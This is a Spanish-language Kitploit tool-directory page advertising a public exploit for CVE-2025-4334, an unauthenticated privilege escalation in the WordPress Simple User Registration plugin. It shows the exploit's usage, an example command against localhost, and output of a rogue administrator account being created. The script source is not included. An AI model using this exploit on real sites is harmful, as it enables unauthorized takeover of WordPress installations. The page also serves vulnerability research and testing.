Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-4334 — Simple User Registration <= 6.3 - Escalada de Privilegios sin Autenticación | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-4334
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2025-4334

CVE-2025-4334

Simple User Registration <= 6.3 - Escalada de Privilegios sin Autenticación

Ver Repositorio
733hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🔓 Simple User Registration <= 6.3 - Escalada de Privilegios No Autenticada

📄 Descripción

El plugin Simple User Registration para WordPress es vulnerable a una Escalada de Privilegios en todas las versiones hasta la 6.3 inclusive.
Esto se debe a restricciones insuficientes en los valores meta de usuario que se pueden proporcionar durante el registro.
Esto permite que atacantes no autenticados se registren como administrador.


🛡️ Detalles de la Vulnerabilidad

  • Tipo: Gestión de Privilegios Incorrecta
  • CVE: CVE-2025-4334
  • Puntuación CVSS: 9.8 (Crítico)
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Publicado Públicamente: 25 de junio de 2025
  • Última Actualización: 26 de junio de 2025

🛠️ Script de Exploit

El exploit automatiza la escalada de privilegios mediante el envío de formularios utilizando el nonce extraído, el ID del formulario y el referer.

⚙️ Uso

root@kitploit:~
python CVE-2025-4334.py -h
root@kitploit:~
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form

🌐 Explicación de la URL

  • -u → Instalación base de WordPress (ej. http://localhost/wordpress/)
  • --form → URL completa del formulario de registro vulnerable (ej. http://localhost/wpr/default-registration/)

🧪 Ejemplo

root@kitploit:~
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/

✅ Resultado

root@kitploit:~
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : [email protected]
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)

⚠️ Descargo de Responsabilidad

Este script se proporciona únicamente con fines educativos y de investigación.
El autor no se hace responsable del mal uso o daños causados por esta herramienta.


Por: Khaled_alenazi (Nxploited)

Descargar herramienta